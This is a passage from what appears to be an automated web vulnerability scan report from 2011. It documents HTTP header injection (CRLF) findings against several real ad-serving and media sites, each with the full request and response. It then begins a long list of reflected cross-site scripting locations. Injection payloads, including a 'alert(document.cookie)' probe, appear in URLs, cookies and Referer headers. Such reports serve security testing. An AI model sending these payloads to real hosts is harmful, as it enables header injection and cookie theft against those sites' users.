Date: Mon, 24 Jan 2011 22:29:18 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.3. http://ad.doubleclick.net/adj/fmpub.tweetmeme/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fmpub.tweetmeme/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 90a37%0d%0a55eb3835e88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /90a37%0d%0a55eb3835e88/fmpub.tweetmeme/;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;ord=9735370394773782; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/90a37
55eb3835e88/fmpub.tweetmeme/%3Bsz%3D160x600%3Bfmzid%3D2673%3B%3Bfmcls%3DATF%3Btile%3D1%3Bqcseg%3DD%3Bqcseg%3DT%3Bqcseg%3D2891%3Bqcseg%3D2867%3Bqcseg%3D2866%3Bqcseg%3D2865%3Bqcseg%3D2363%3Bqcseg%3D2362%3Bqcseg%3D2355%3Bqcseg%3D2353%3Bqcseg%3D2352%3Bqcseg%3D2349%3Bqcseg%3D2339%3Bqcseg%3D1286%3Bqcseg%3D1160%3Bqcseg%3D1159%3Bqcseg%3D1156%3Bqcseg%3D1149%3Bqcseg%3D1148%3Bqcseg%3D983%3Bord%3D973537:
Date: Tue, 25 Jan 2011 04:26:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f8e54%0d%0a5ad09fe6b0e was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2150004&PluID=0&ord=1295907707715&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f8e54%0d%0a5ad09fe6b0e; A3=gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f8e54
5ad09fe6b0e; expires=Sun, 24-Apr-2011 23: 27:57 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gNfHaaov0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 23:27:57 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 23:27:57 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 23:27:57 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 25 Jan 2011 04:27:57 GMT
Connection: close

3.5. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.parenthood.com
Path:	/kickapps/service/getWidgetSwf.kickAction

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9919a%0d%0a8ed3d3a570a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9919a%0d%0a8ed3d3a570a/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:30:20 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=A76D16466300A16AB155473E54F4E0D6; Path=/
Location: http://community.parenthood.com/9919a
8ed3d3a570a/service/getWidgetSwf.kickAction/index.html
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:30:20 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

3.6. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.parenthood.com
Path:	/kickapps/service/getWidgetSwf.kickAction

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8b555%0d%0a22151d96637 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /kickapps/service/getWidgetSwf.kickAction?8b555%0d%0a22151d96637=1 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 04:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=E15042C488ADD828D1708B6F7E91CB18; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589&8b555
22151d96637=1
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 04:29:10 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

3.7. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://java.sun.com
Path:	/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload bbba5%0d%0afd261744c82 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /products/plugin/autodl/jinstall-1_4_2-windows-i586.cabbbba5%0d%0afd261744c82 HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:11:12 GMT
Location: /update/1.4.2/jinstall-1_4_2-windows-i586.cabbbba5
fd261744c82
Content-length: 0
Connection: close

3.8. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kickapps.yuku.com
Path:	/kickapps/service/getWidget.kickAction

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b8001%0d%0adc2701e3e3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b8001%0d%0adc2701e3e3b/service/getWidget.kickAction?widgetId=21535&as=40337 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 03:04:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=FD7E83564A2B6498217379533A2EBF6C; Path=/
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 03:04:27 GMT; Path=/
Location: http://kickapps.yuku.com/b8001
dc2701e3e3b/service/getWidget.kickAction/index.html
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 03:04:27 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

3.9. http://rd.apmebf.com/w/pg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/pg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b5b5b%0d%0abf598142f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b5b5b%0d%0abf598142f7/pg?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fks3qs-58150-1294536375707-a5

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 03:07:45 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 03:07:45 GMT
Location: http://media.fastclick.net/b5b5b
bf598142f7/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/b5b5b
bf598142f7/pg
...[SNIP]...

3.10. http://rd.apmebf.com/w/pg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/pg

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bfc39%0d%0a8009e591a60 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /w/bfc39%0d%0a8009e591a60?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fks3qs-58150-1294536375707-a5

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 03:07:48 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 03:07:48 GMT
Location: http://media.fastclick.net/w/bfc39
8009e591a60?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/bfc39
8009e591a60
...[SNIP]...

3.11. http://rd.apmebf.com/w/pg [S cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/pg

Issue detail

The value of the S cookie is copied into the Set-Cookie response header. The payload b55c0%0d%0a6458ee17d9d was submitted in the S cookie. This caused a response containing an injected HTTP header.

Request

GET /w/pg?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=b55c0%0d%0a6458ee17d9d

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 03:07:35 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=b55c0
6458ee17d9d; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 03:07:35 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=070567674791
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/pg?cont_id=11&
...[SNIP]...

3.12. http://segnalo.alice.it/post.html.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segnalo.alice.it
Path:	/post.html.php

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 48606%0d%0a40911a07938 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /48606%0d%0a40911a07938 HTTP/1.1
Host: segnalo.alice.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:16:48 GMT
Server: Apache/2.2.3 (Unix)
Location: http://segnalo.virgilio.it/userreq.php?username=48606
40911a07938&tag=
Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://segnalo.virgilio.it/userreq.php?username
...[SNIP]...

3.13. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 75a01%0d%0aefba738129d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AGU&si=17295&pi=M&xs=3&pu=http%253A//www.autobytel.com/x22%2526ifu%253Dhttp%25253A//burp/show/31&v=5.5&cb=96663 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=60848^1^1296494968; TData=99999|^|56780|60739|#|60848; Anxd=x; N=2:faabfca985572b481d74a4897e4d9013,71e5fe306b3f97af479b09e96a0ca00a75a01%0d%0aefba738129d; ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg=

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:22:15 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 24 Jan 2011 22:37:15 GMT
Set-Cookie: ANRTT=60848^1^1296494968|62722^1^1296512535; path=/; expires=Mon, 31-Jan-11 22:22:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1295907735^1295909535|17295^1295907735^1295909535; path=/; expires=Mon, 24-Jan-11 22:52:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 22:22:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Tue, 25-Jan-11 04:22:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:71e5fe306b3f97af479b09e96a0ca00a75a01
efba738129d,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 22:22:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 22:22:15 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 128
Content-Type: application/x-javascript
Content-Length: 128

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|56780|60739|#|60848|62722';
ANRTXR();

3.14. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload eca17%0d%0a2d0ccfdc61b was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AGU&si=eca17%0d%0a2d0ccfdc61b&pi=M&xs=3&pu=http%253A//www.autobytel.com/x22%2526ifu%253Dhttp%25253A//burp/show/31&v=5.5&cb=96663 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=60848^1^1296494968; TData=99999|^|56780|60739|#|60848; Anxd=x; N=2:faabfca985572b481d74a4897e4d9013,71e5fe306b3f97af479b09e96a0ca00a; ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg=

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:20:49 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 24 Jan 2011 22:35:49 GMT
Set-Cookie: ANRTT=60848^1^1296494968|62722^1^1296512449; path=/; expires=Mon, 31-Jan-11 22:20:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1295907649^1295909449|eca17
2d0ccfdc61b^1295907649^1295909449; path=/; expires=Mon, 24-Jan-11 22:50:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 22:20:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Tue, 25-Jan-11 04:20:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:71e5fe306b3f97af479b09e96a0ca00a,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 22:20:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 22:20:49 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 128
Content-Type: application/x-javascript
Content-Length: 128

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|56780|60739|#|60848|62722';
ANRTXR();

3.15. http://www.myproductadvisor.com/mpa/autobytel/setCookie.do [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myproductadvisor.com
Path:	/mpa/autobytel/setCookie.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7d2d3%0d%0a4fb5754f9c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /mpa/7d2d3%0d%0a4fb5754f9c5/setCookie.do HTTP/1.1
Host: www.myproductadvisor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 00:08:56 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: UIVERSION_COOKIE=1; Path=/mpa/
Location: http://www.myproductadvisor.com/mpa/base/7d2d3
4fb5754f9c5/setCookie.do
Content-Length: 0
P3P: policyref="/content/w3c/p3p.xml", CP="NOI DSP NID CURa ADMa DEVa TAIa PSAa PSDa OUR NOR IND COM NAV STA"
Connection: close
Content-Type: text/plain; charset=UTF-8

4. Cross-site scripting (reflected) previous next
There are 2093 instances of this issue:

http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]
http://ads.tweetmeme.com/serve.js [height parameter]
http://ads.tweetmeme.com/serve.js [width parameter]
http://adserver.teracent.net/tase/ad [AMod parameter]
http://adserver.teracent.net/tase/ad [AMod parameter]
http://adserver.teracent.net/tase/ad [ASeg parameter]
http://adserver.teracent.net/tase/ad [ASeg parameter]
http://adserver.teracent.net/tase/ad [AdID parameter]
http://adserver.teracent.net/tase/ad [AdID parameter]
http://adserver.teracent.net/tase/ad [FlightID parameter]
http://adserver.teracent.net/tase/ad [FlightID parameter]
http://adserver.teracent.net/tase/ad [RawValues parameter]
http://adserver.teracent.net/tase/ad [RawValues parameter]
http://adserver.teracent.net/tase/ad [Redirect parameter]
http://adserver.teracent.net/tase/ad [Redirect parameter]
http://adserver.teracent.net/tase/ad [Segments parameter]
http://adserver.teracent.net/tase/ad [Segments parameter]
http://adserver.teracent.net/tase/ad [TargetID parameter]
http://adserver.teracent.net/tase/ad [TargetID parameter]
http://adserver.teracent.net/tase/ad [Targets parameter]
http://adserver.teracent.net/tase/ad [Targets parameter]
http://adserver.teracent.net/tase/ad [Values parameter]
http://adserver.teracent.net/tase/ad [Values parameter]
http://adserver.teracent.net/tase/ad [adId parameter]
http://adserver.teracent.net/tase/ad [adId parameter]
http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]
http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]
http://adserver.teracent.net/tase/ad [rcu parameter]
http://adserver.teracent.net/tase/ad [rcu parameter]
http://api.facebook.com/restserver.php [method parameter]
http://api.facebook.com/restserver.php [urls parameter]
http://api.tweetmeme.com/url_info.jsonc [callback parameter]
http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard [mbox parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 2]
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 3]
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 4]
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 5]
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 6]
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 7]
http://bid.openx.net/json [c parameter]
http://bid.openx.net/json [c parameter]
http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 7]
http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 8]
http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [monid parameter]
http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [name of an arbitrarily supplied request parameter]
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [btid parameter]
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [ei parameter]
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [rtbhost parameter]
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [wp_exchange parameter]
http://click.linksynergy.com/fs-bin/click [offerid parameter]
http://delb.opt.fimserve.com/fimbid/ [cb parameter]
http://developer.joomla.org/a [REST URL parameter 1]
http://developer.joomla.org/getting-started.html [REST URL parameter 1]
http://developer.joomla.org/improving-joomla.html [REST URL parameter 1]
http://developer.joomla.org/security.html [REST URL parameter 1]
http://developer.joomla.org/security/a [REST URL parameter 2]
http://developer.joomla.org/security/news.html [REST URL parameter 2]
http://developer.joomla.org/security/news.html [name of an arbitrarily supplied request parameter]
http://developer.joomla.org/strategy.html [REST URL parameter 1]
